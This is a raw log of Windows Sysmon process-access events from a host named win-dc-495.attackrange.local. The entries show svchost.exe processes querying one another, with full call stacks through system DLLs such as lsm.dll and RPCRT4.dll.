13:58:22.305{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010922Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.305{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010921Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.305{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010920Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.305{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010919Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.305{59A5CD1D-93FB-6005-FE04-00000000A301}5108820C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FD04-00000000A301}1156C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\appxdeploymentserver.dll+6468b|c:\windows\system32\appxdeploymentserver.dll+2d35e|c:\windows\system32\appxdeploymentserver.dll+2d19d|c:\windows\system32\appxdeploymentserver.dll+114d56|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010918Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.305{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010917Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.305{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010916Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.305{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010915Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.305{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010914Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.305{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010913Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.305{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010912Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.305{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010911Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.305{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010910Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.305{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010909Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.305{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010908Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.305{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010907Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.305{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010906Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.305{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010905Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.305{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010904Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.305{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010903Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.305{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010902Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.305{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010901Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.305{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010900Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.305{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010899Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 